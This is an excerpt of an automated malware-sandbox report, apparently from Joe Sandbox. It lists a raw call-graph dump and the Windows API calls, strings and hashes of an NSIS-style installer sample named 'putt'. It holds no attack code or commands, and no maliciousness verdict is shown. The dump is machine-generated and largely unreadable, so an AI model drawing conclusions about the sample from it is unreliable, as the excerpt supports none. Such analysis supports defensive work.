4825->4831 4827 403fad SendMessageW 4827->4823 4829 40141d 80 API calls 4828->4829 4829->4831 4831->4826 4832->4827 4833 402392 4834 40145c 18 API calls 4833->4834 4835 402399 4834->4835 4838 407224 4835->4838 4839 406efe 25 API calls 4838->4839 4840 407244 4839->4840 4841 4023a7 4840->4841 4842 40724e lstrcpynW lstrcmpW 4840->4842 4843 407280 4842->4843 4844 407286 lstrcpynW 4842->4844 4843->4844 4844->4841 3338 402713 3353 406035 lstrcpynW 3338->3353 3340 40272c 3354 406035 lstrcpynW 3340->3354 3342 402738 3343 402743 3342->3343 3344 40145c 18 API calls 3342->3344 3345 40145c 18 API calls 3343->3345 3347 402752 3343->3347 3344->3343 3345->3347 3348 40145c 18 API calls 3347->3348 3350 402761 3347->3350 3348->3350 3355 40145c 3350->3355 3353->3340 3354->3342 3363 406831 3355->3363 3358 401497 3360 4062cf lstrlenW wvsprintfW 3358->3360 3402 406113 3360->3402 3379 40683e 3363->3379 3364 406aab 3365 401488 3364->3365 3397 406035 lstrcpynW 3364->3397 3365->3358 3381 406064 3365->3381 3367 4068ff GetVersion 3367->3379 3368 406a72 lstrlenW 3368->3379 3370 406831 10 API calls 3370->3368 3373 40697e GetSystemDirectoryW 3373->3379 3374 406064 5 API calls 3374->3379 3375 406991 GetWindowsDirectoryW 3375->3379 3376 406831 10 API calls 3376->3379 3377 406a0b lstrcatW 3377->3379 3378 4069c5 SHGetSpecialFolderLocation 3378->3379 3380 4069dd SHGetPathFromIDListW CoTaskMemFree 3378->3380 3379->3364 3379->3367 3379->3368 3379->3370 3379->3373 3379->3374 3379->3375 3379->3376 3379->3377 3379->3378 3390 405eff RegOpenKeyExW 3379->3390 3395 405f7d wsprintfW 3379->3395 3396 406035 lstrcpynW 3379->3396 3380->3379 3388 406071 3381->3388 3382 4060e7 3383 4060ed CharPrevW 3382->3383 3385 40610d 3382->3385 3383->3382 3384 4060da CharNextW 3384->3382 3384->3388 3385->3358 3387 4060c6 CharNextW 3387->3388 3388->3382 3388->3384 3388->3387 3389 4060d5 CharNextW 3388->3389 3398 405d32 3388->3398 3389->3384 3391 405f33 RegQueryValueExW 3390->3391 3392 405f78 3390->3392 3393 405f55 RegCloseKey 
3391->3393 3392->3379 3393->3392 3395->3379 3396->3379 3397->3365 3399 405d38 3398->3399 3400 405d4e 3399->3400 3401 405d3f CharNextW 3399->3401 3400->3388 3401->3399 3403 40613c 3402->3403 3404 40611f 3402->3404 3406 4061b3 3403->3406 3407 406159 3403->3407 3408 40277f WritePrivateProfileStringW 3403->3408 3405 406129 CloseHandle 3404->3405 3404->3408 3405->3408 3406->3408 3409 4061bc lstrcatW lstrlenW WriteFile 3406->3409 3407->3409 3410 406162 GetFileAttributesW 3407->3410 3409->3408 3415 405e7c GetFileAttributesW CreateFileW 3410->3415 3412 40617e 3412->3408 3413 4061a8 SetFilePointer 3412->3413 3414 40618e WriteFile 3412->3414 3413->3406 3414->3413 3415->3412 4845 402797 4846 40145c 18 API calls 4845->4846 4847 4027ae 4846->4847 4848 40145c 18 API calls 4847->4848 4849 4027b7 4848->4849 4850 40145c 18 API calls 4849->4850 4851 4027c0 GetPrivateProfileStringW lstrcmpW 4850->4851 4852 401e9a 4853 40145c 18 API calls 4852->4853 4854 401ea1 4853->4854 4855 401446 18 API calls 4854->4855 4856 401eab wsprintfW 4855->4856 3816 401a1f 3817 40145c 18 API calls 3816->3817 3818 401a26 3817->3818 3819 4062cf 11 API calls 3818->3819 3820 401a49 3819->3820 3821 401a64 3820->3821 3822 401a5c 3820->3822 3891 406035 lstrcpynW 3821->3891 3890 406035 lstrcpynW 3822->3890 3825 401a6f 3892 40674e lstrlenW CharPrevW 3825->3892 3826 401a62 3829 406064 5 API calls 3826->3829 3860 401a81 3829->3860 3830 406301 2 API calls 3830->3860 3833 401a98 CompareFileTime 3833->3860 3834 401ba9 3835 404f9e 25 API calls 3834->3835 3837 401bb3 3835->3837 3836 401b5d 3838 404f9e 25 API calls 3836->3838 3869 40337f 3837->3869 3840 401b70 3838->3840 3844 4062cf 11 API calls 3840->3844 3842 406035 lstrcpynW 3842->3860 3843 4062cf 11 API calls 3845 401bda 3843->3845 3849 401b8b 3844->3849 3846 401be9 SetFileTime 3845->3846 3847 401bf8 CloseHandle 3845->3847 3846->3847 3847->3849 3850 401c09 3847->3850 3848 406831 18 API calls 3848->3860 3851 401c21 3850->3851 3852 401c0e 3850->3852 3853 406831 18 API 
calls 3851->3853 3854 406831 18 API calls 3852->3854 3855 401c29 3853->3855 3857 401c16 lstrcatW 3854->3857 3858 4062cf 11 API calls 3855->3858 3857->3855 3861 401c34 3858->3861 3859 401b50 3863 401b93 3859->3863 3864 401b53 3859->3864 3860->3830 3860->3833 3860->3834 3860->3836 3860->3842 3860->3848 3860->3859 3862 4062cf 11 API calls 3860->3862 3868 405e7c GetFileAttributesW CreateFileW 3860->3868 3895 405e5c GetFileAttributesW 3860->3895 3898 405ccc 3860->3898 3865 405ccc MessageBoxIndirectW 3861->3865 3862->3860 3866 4062cf 11 API calls 3863->3866 3867 4062cf 11 API calls 3864->3867 3865->3849 3866->3849 3867->3836 3868->3860 3870 40339a 3869->3870 3871 4033c7 3870->3871 3904 403368 SetFilePointer 3870->3904 3902 403336 ReadFile 3871->3902 3875 401bc6 3875->3843 3876 403546 3878 40354a 3876->3878 3879 40356e 3876->3879 3877 4033eb GetTickCount 3877->3875 3882 403438 3877->3882 3880 403336 ReadFile 3878->3880 3879->3875 3883 403336 ReadFile 3879->3883 3884 40358d WriteFile 3879->3884 3880->3875 3881 403336 ReadFile 3881->3882 3882->3875 3882->3881 3886 40348a GetTickCount 3882->3886 3887 4034af MulDiv wsprintfW 3882->3887 3889 4034f3 WriteFile 3882->3889 3883->3879 3884->3875 3885 4035a1 3884->3885 3885->3875 3885->3879 3886->3882 3888 404f9e 25 API calls 3887->3888 3888->3882 3889->3875 3889->3882 3890->3826 3891->3825 3893 401a75 lstrcatW 3892->3893 3894 40676b lstrcatW 3892->3894 3893->3826 3894->3893 3896 405e79 3895->3896 3897 405e6b SetFileAttributesW 3895->3897 3896->3860 3897->3896 3899 405ce1 3898->3899 3900 405d2f 3899->3900 3901 405cf7 MessageBoxIndirectW 3899->3901 3900->3860 3901->3900 3903 403357 3902->3903 3903->3875 3903->3876 3903->3877 3904->3871 4857 40209f GetDlgItem GetClientRect 4858 40145c 18 API calls 4857->4858 4859 4020cf LoadImageW SendMessageW 4858->4859 4860 4030e3 4859->4860 4861 4020ed DeleteObject 4859->4861 4861->4860 4862 402b9f 4863 401446 18 API calls 4862->4863 4867 402ba7 4863->4867 4864 402c4a 4865 402bdf ReadFile 
4865->4867 4874 402c3d 4865->4874 4866 401446 18 API calls 4866->4874 4867->4864 4867->4865 4868 402c06 MultiByteToWideChar 4867->4868 4869 402c3f 4867->4869 4870 402c4f 4867->4870 4867->4874 4868->4867 4868->4870 4875 405f7d wsprintfW 4869->4875 4872 402c6b SetFilePointer 4870->4872 4870->4874 4872->4874 4873 402d17 ReadFile 4873->4874 4874->4864 4874->4866 4874->4873 4875->4864 4876 402b23 GlobalAlloc 4877 402b39 4876->4877 4878 402b4b 4876->4878 4879 401446 18 API calls 4877->4879 4880 40145c 18 API calls 4878->4880 4882 402b41 4879->4882 4881 402b52 WideCharToMultiByte lstrlenA 4880->4881 4881->4882 4883 402b84 WriteFile 4882->4883 4884 402b93 4882->4884 4883->4884 4885 402384 GlobalFree 4883->4885 4885->4884 4887 4040a3 4888 4040b0 lstrcpynW lstrlenW 4887->4888 4889 4040ad 4887->4889 4889->4888 3429 4054a5 3430 4055f9 3429->3430 3431 4054bd 3429->3431 3433 40564a 3430->3433 3434 40560a GetDlgItem GetDlgItem 3430->3434 3431->3430 3432 4054c9 3431->3432 3436 4054d4 SetWindowPos 3432->3436 3437 4054e7 3432->3437 3435 4056a4 3433->3435 3443 40139d 80 API calls 3433->3443 3438 403d6b 19 API calls 3434->3438 3444 4055f4 3435->3444 3499 403ddb 3435->3499 3436->3437 3440 405504 3437->3440 3441 4054ec ShowWindow 3437->3441 3442 405634 SetClassLongW 3438->3442 3445 405526 3440->3445 3446 40550c DestroyWindow 3440->3446 3441->3440 3447 40141d 80 API calls 3442->3447 3450 40567c 3443->3450 3448 40552b SetWindowLongW 3445->3448 3449 40553c 3445->3449 3451 405908 3446->3451 3447->3433 3448->3444 3452 4055e5 3449->3452 3453 405548 GetDlgItem 3449->3453 3450->3435 3454 405680 SendMessageW 3450->3454 3451->3444 3460 405939 ShowWindow 3451->3460 3519 403df6 3452->3519 3457 405578 3453->3457 3458 40555b SendMessageW IsWindowEnabled 3453->3458 3454->3444 3455 40141d 80 API calls 3468 4056b6 3455->3468 3456 40590a KiUserCallbackDispatcher KiUserCallbackDispatcher 3456->3451 3462 405585 3457->3462 3465 4055cc SendMessageW 3457->3465 3466 405598 3457->3466 3474 40557d 3457->3474 
3458->3444 3458->3457 3460->3444 3461 406831 18 API calls 3461->3468 3462->3465 3462->3474 3464 403d6b 19 API calls 3464->3468 3465->3452 3469 4055a0 3466->3469 3470 4055b5 3466->3470 3467 4055b3 3467->3452 3468->3444 3468->3455 3468->3456 3468->3461 3468->3464 3490 40584a DestroyWindow 3468->3490 3502 403d6b 3468->3502 3513 40141d 3469->3513 3471 40141d 80 API calls 3470->3471 3473 4055bc 3471->3473 3473->3452 3473->3474 3516 403d44 3474->3516 3476 405731 GetDlgItem 3477 405746 3476->3477 3478 40574f ShowWindow KiUserCallbackDispatcher 3476->3478 3477->3478 3505 403db1 KiUserCallbackDispatcher 3478->3505 3480 405779 EnableWindow 3483 40578d 3480->3483 3481 405792 GetSystemMenu EnableMenuItem SendMessageW 3482 4057c2 SendMessageW 3481->3482 3481->3483 3482->3483 3483->3481 3506 403dc4 SendMessageW 3483->3506 3507 406035 lstrcpynW 3483->3507 3486 4057f0 lstrlenW 3487 406831 18 API calls 3486->3487 3488 405806 SetWindowTextW 3487->3488 3508 40139d 3488->3508 3490->3451 3491 405864 CreateDialogParamW 3490->3491 3491->3451 3492 405897 3491->3492 3493 403d6b 19 API calls 3492->3493 3494 4058a2 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3493->3494 3495 40139d 80 API calls 3494->3495 3496 4058e8 3495->3496 3496->3444 3497 4058f0 ShowWindow 3496->3497 3498 403ddb SendMessageW 3497->3498 3498->3451 3500 403df3 3499->3500 3501 403de4 SendMessageW 3499->3501 3500->3468 3501->3500 3503 406831 18 API calls 3502->3503 3504 403d76 SetDlgItemTextW 3503->3504 3504->3476 3505->3480 3506->3483 3507->3486 3511 4013a4 3508->3511 3509 401410 3509->3468 3511->3509 3512 4013dd MulDiv SendMessageW 3511->3512 3533 4015a0 3511->3533 3512->3511 3514 40139d 80 API calls 3513->3514 3515 401432 3514->3515 3515->3474 3517 403d51 SendMessageW 3516->3517 3518 403d4b 3516->3518 3517->3467 3518->3517 3520 403e0b GetWindowLongW 3519->3520 3530 403e94 3519->3530 3521 403e1c 3520->3521 3520->3530 3522 403e2b GetSysColor 3521->3522 3523 403e2e 3521->3523 3522->3523 3524 403e34 SetTextColor 
3523->3524 3525 403e3e SetBkMode 3523->3525 3524->3525 3526 403e56 GetSysColor 3525->3526 3527 403e5c 3525->3527 3526->3527 3528 403e63 SetBkColor 3527->3528 3529 403e6d 3527->3529 3528->3529 3529->3530 3531 403e80 DeleteObject 3529->3531 3532 403e87 CreateBrushIndirect 3529->3532 3530->3444 3531->3532 3532->3530 3534 4015fa 3533->3534 3613 40160c 3533->3613 3535 401601 3534->3535 3536 401742 3534->3536 3537 401962 3534->3537 3538 4019ca 3534->3538 3539 40176e 3534->3539 3540 401650 3534->3540 3541 4017b1 3534->3541 3542 401672 3534->3542 3543 401693 3534->3543 3544 401616 3534->3544 3545 4016d6 3534->3545 3546 401736 3534->3546 3547 401897 3534->3547 3548 4018db 3534->3548 3549 40163c 3534->3549 3550 4016bd 3534->3550 3534->3613 3559 4062cf 11 API calls 3535->3559 3551 401751 ShowWindow 3536->3551 3552 401758 3536->3552 3556 40145c 18 API calls 3537->3556 3563 40145c 18 API calls 3538->3563 3553 40145c 18 API calls 3539->3553 3577 4062cf 11 API calls 3540->3577 3557 40145c 18 API calls 3541->3557 3554 40145c 18 API calls 3542->3554 3558 401446 18 API calls 3543->3558 3562 40145c 18 API calls 3544->3562 3576 401446 18 API calls 3545->3576 3545->3613 3546->3613 3667 405f7d wsprintfW 3546->3667 3555 40145c 18 API calls 3547->3555 3560 40145c 18 API calls 3548->3560 3564 401647 PostQuitMessage 3549->3564 3549->3613 3561 4062cf 11 API calls 3550->3561 3551->3552 3565 401765 ShowWindow 3552->3565 3552->3613 3566 401775 3553->3566 3567 401678 3554->3567 3568 40189d 3555->3568 3569 401968 GetFullPathNameW 3556->3569 3570 4017b8 3557->3570 3571 40169a 3558->3571 3559->3613 3572 4018e2 3560->3572 3573 4016c7 SetForegroundWindow 3561->3573 3574 40161c 3562->3574 3575 4019d1 SearchPathW 3563->3575 3564->3613 3565->3613 3579 4062cf 11 API calls 3566->3579 3580 4062cf 11 API calls 3567->3580 3658 406301 FindFirstFileW 3568->3658 3582 4019a1 3569->3582 3583 40197f 3569->3583 3584 4062cf 11 API calls 3570->3584 3585 4062cf 11 API calls 3571->3585 3586 40145c 18 API calls 
3572->3586 3573->3613 3587 4062cf 11 API calls 3574->3587 3575->3546 3575->3613 3576->3613 3588 401664 3577->3588 3589 401785 SetFileAttributesW 3579->3589 3590 401683 3580->3590 3602 4019b8 GetShortPathNameW 3582->3602 3582->3613 3583->3582 3608 406301 2 API calls 3583->3608 3592 4017c9 3584->3592 3593 4016a7 Sleep 3585->3593 3594 4018eb 3586->3594 3595 401627 3587->3595 3596 40139d 65 API calls 3588->3596 3597 40179a 3589->3597 3589->3613 3606 404f9e 25 API calls 3590->3606 3640 405d85 CharNextW CharNextW 3592->3640 3593->3613 3603 40145c 18 API calls 3594->3603 3604 404f9e 25 API calls 3595->3604 3596->3613 3605 4062cf 11 API calls 3597->3605 3598 4018c2 3609 4062cf 11 API calls 3598->3609 3599 4018a9 3607 4062cf 11 API calls 3599->3607 3602->3613 3611 4018f5 3603->3611 3604->3613 3605->3613 3606->3613 3607->3613 3612 401991 3608->3612 3609->3613 3610 4017d4 3614 401864 3610->3614 3617 405d32 CharNextW 3610->3617 3635 4062cf 11 API calls 3610->3635 3615 4062cf 11 API calls 3611->3615 3612->3582 3666 406035 lstrcpynW 3612->3666 3613->3511 3614->3590 3616 40186e 3614->3616 3618 401902 MoveFileW 3615->3618 3646 404f9e 3616->3646 3621 4017e6 CreateDirectoryW 3617->3621 3622 401912 3618->3622 3623 40191e 3618->3623 3621->3610 3625 4017fe GetLastError 3621->3625 3622->3590 3629 406301 2 API calls 3623->3629 3639 401942 3623->3639 3627 401827 GetFileAttributesW 3625->3627 3628 40180b GetLastError 3625->3628 3627->3610 3632 4062cf 11 API calls 3628->3632 3633 401929 3629->3633 3630 401882 SetCurrentDirectoryW 3630->3613 3631 4062cf 11 API calls 3634 40195c 3631->3634 3632->3610 3633->3639 3661 406c94 3633->3661 3634->3613 3635->3610 3638 404f9e 25 API calls 3638->3639 3639->3631 3641 405da2 3640->3641 3644 405db4 3640->3644 3643 405daf CharNextW 3641->3643 3641->3644 3642 405dd8 3642->3610 3643->3642 3644->3642 3645 405d32 CharNextW 3644->3645 3645->3644 3647 404fb7 3646->3647 3648 401875 3646->3648 3649 404fd5 lstrlenW 3647->3649 3650 406831 18 API calls 3647->3650 
3657 406035 lstrcpynW 3648->3657 3651 404fe3 lstrlenW 3649->3651 3652 404ffe 3649->3652 3650->3649 3651->3648 3653 404ff5 lstrcatW 3651->3653 3654 405011 3652->3654 3655 405004 SetWindowTextW 3652->3655 3653->3652 3654->3648 3656 405017 SendMessageW SendMessageW SendMessageW 3654->3656 3655->3654 3656->3648 3657->3630 3659 4018a5 3658->3659 3660 406317 FindClose 3658->3660 3659->3598 3659->3599 3660->3659 3668 406328 GetModuleHandleA 3661->3668 3665 401936 3665->3638 3666->3582 3667->3613 3669 406340 LoadLibraryA 3668->3669 3670 40634b GetProcAddress 3668->3670 3669->3670 3671 406359 3669->3671 3670->3671 3671->3665 3672 406ac5 lstrcpyW 3671->3672 3673 406b13 GetShortPathNameW 3672->3673 3674 406aea 3672->3674 3675 406b2c 3673->3675 3676 406c8e 3673->3676 3698 405e7c GetFileAttributesW CreateFileW 3674->3698 3675->3676 3679 406b34 WideCharToMultiByte 3675->3679 3676->3665 3678 406af3 CloseHandle GetShortPathNameW 3678->3676 3680 406b0b 3678->3680 3679->3676 3681 406b51 WideCharToMultiByte 3679->3681 3680->3673 3680->3676 3681->3676 3682 406b69 wsprintfA 3681->3682 3683 406831 18 API calls 3682->3683 3684 406b95 3683->3684 3699 405e7c GetFileAttributesW CreateFileW 3684->3699 3686 406ba2 3686->3676 3687 406baf GetFileSize GlobalAlloc 3686->3687 3688 406bd0 ReadFile 3687->3688 3689 406c84 CloseHandle 3687->3689 3688->3689 3690 406bea 3688->3690 3689->3676 3690->3689 3700 405de2 lstrlenA 3690->3700 3693 406c03 lstrcpyA 3696 406c25 3693->3696 3694 406c17 3695 405de2 4 API calls 3694->3695 3695->3696 3697 406c5c SetFilePointer WriteFile GlobalFree 3696->3697 3697->3689 3698->3678 3699->3686 3701 405e23 lstrlenA 3700->3701 3702 405e2b 3701->3702 3703 405dfc lstrcmpiA 3701->3703 3702->3693 3702->3694 3703->3702 3704 405e1a CharNextA 3703->3704 3704->3701 4890 402da5 4891 4030e3 4890->4891 4892 402dac 4890->4892 4893 401446 18 API calls 4892->4893 4894 402db8 4893->4894 4895 402dbf SetFilePointer 4894->4895 4895->4891 4896 402dcf 4895->4896 4896->4891 4898 405f7d wsprintfW 

Control-flow Graph

• Executed
• Not Executed
APIs
• GetDlgItem.USER32(?,00000403), ref: 0040515B
• GetDlgItem.USER32(?,000003EE), ref: 0040516A
• GetClientRect.USER32(?,?), ref: 004051C2
• GetSystemMetrics.USER32(00000015), ref: 004051CA
• SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
• SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
• SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
• SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
• SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
• ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
• ShowWindow.USER32(?,00000008), ref: 00405266
• GetDlgItem.USER32(?,000003EC), ref: 00405287
• SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
• SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
• SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
• GetDlgItem.USER32(?,000003F8), ref: 00405179
  • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
  • Part of subcall function 00406831: GetVersion.KERNEL32(Completed,?,00000000,00404FD5,Completed,00000000,00426976,762323A0,00000000), ref: 00406902
  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
• GetDlgItem.USER32(?,000003EC), ref: 004052D7
• CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
• CloseHandle.KERNELBASE(00000000), ref: 004052EC
• ShowWindow.USER32(00000000), ref: 00405313
• ShowWindow.USER32(?,00000008), ref: 00405318
• ShowWindow.USER32(00000008), ref: 0040535F
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
• CreatePopupMenu.USER32 ref: 004053A2
• AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
• GetWindowRect.USER32(?,?), ref: 004053CA
• TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
• OpenClipboard.USER32(00000000), ref: 00405437
• EmptyClipboard.USER32 ref: 0040543D
• GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
• GlobalLock.KERNEL32(00000000), ref: 00405453
• SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
• GlobalUnlock.KERNEL32(00000000), ref: 00405489
• SetClipboardData.USER32(0000000D,00000000), ref: 00405494
• CloseClipboard.USER32 ref: 0040549A
Strings
Memory Dump Source
• Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 0000000E.00000002.2513431204.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000E.00000002.2513486557.0000000000409000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000E.00000002.2513512419.000000000040C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000E.00000002.2513512419.0000000000420000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000E.00000002.2513512419.000000000042C000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000E.00000002.2513512419.0000000000434000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000E.00000002.2513512419.0000000000445000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000E.00000002.2513512419.000000000046B000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000E.00000002.2513512419.00000000004A3000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000E.00000002.2513725197.0000000000500000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_14_2_400000_putt.jbxd
Similarity
• API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
• String ID: New install of "%s" to "%s"${
• API String ID: 2110491804-1641061399
• Opcode ID: bcb774d99f95268555e073945e74a63dc3a3de547f83199e57bf6b1f44cb798b
• Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
• Opcode Fuzzy Hash: bcb774d99f95268555e073945e74a63dc3a3de547f83199e57bf6b1f44cb798b
• Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                                                                                                                              • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                                                                                                                                • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                              • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                                                                                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                              • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                                                                                                                              • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                                                                                                                              • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                                                                                                                              • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                                                                                                                              • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                                                                                                                              • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                                                                                                                              • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                                                                                                                              • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                                                                                                                              • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                              • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                                                                                                                              • API String ID: 2435955865-3712954417

                                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetVersion.KERNEL32(Completed,?,00000000,00404FD5,Completed,00000000,00426976,762323A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                                                                                                                                                • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                                                                                                                                              • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                                                                                                                              • lstrlenW.KERNEL32(0046E220,Completed,?,00000000,00404FD5,Completed,00000000,00426976,762323A0,00000000), ref: 00406A73
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_14_2_400000_putt.jbxd
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                                                                                                              • String ID: F$ F$Completed$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                                                              • API String ID: 3581403547-498560682
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                              • String ID: jF
                                                                                                                                                                                                                                                                              • API String ID: 2295610775-3349280890
                                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                              • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                                              • Source File: 0000000E.00000002.2513455942.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                                              • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                                                              • API String ID: 310444273-0

